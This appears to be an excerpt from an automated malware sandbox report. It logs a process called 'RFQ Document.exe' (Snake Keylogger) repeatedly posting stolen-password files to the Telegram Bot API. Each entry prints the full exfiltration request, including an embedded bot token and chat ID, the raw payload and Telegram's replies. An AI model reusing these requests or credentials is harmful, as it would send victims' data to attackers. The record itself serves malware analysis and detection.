                                            2021-09-28 05:59:41 UTC417OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 30 31 31 33 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f20113e6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:41 UTC417INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:41 UTC418INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12850,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            263192.168.2.450100149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:41 UTC418OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f218e9b8
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:41 UTC419OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 31 38 65 39 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f218e9b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:41 UTC419INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 518
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:41 UTC419INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12851,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            264192.168.2.450101149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:41 UTC420OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f23f1164
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:41 UTC420OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 33 66 31 31 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f23f1164Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:42 UTC421INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:42 UTC421INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12852,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            265192.168.2.450102149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:42 UTC421OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f25e1060
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:42 UTC422OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 35 65 31 30 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f25e1060Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:42 UTC422INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:42 UTC423INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12853,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            266192.168.2.450103149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:42 UTC423OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f27aaaf6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:42 UTC423OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 37 61 61 61 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f27aaaf6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:42 UTC424INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:42 UTC424INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12854,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            267192.168.2.450104149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:42 UTC425OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f2b1806b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:42 UTC425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 62 31 38 30 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f2b1806bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:42 UTC425INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:42 UTC426INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12855,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808782,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            268192.168.2.450105149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:42 UTC426OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f2e5f3fe
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:42 UTC427OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 32 65 35 66 33 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f2e5f3feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:43 UTC427INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:43 UTC427INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12856,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            269192.168.2.450106149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:43 UTC428OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f31ccb95
                                            Host: api.telegram.org
                                            Content-Length: 407
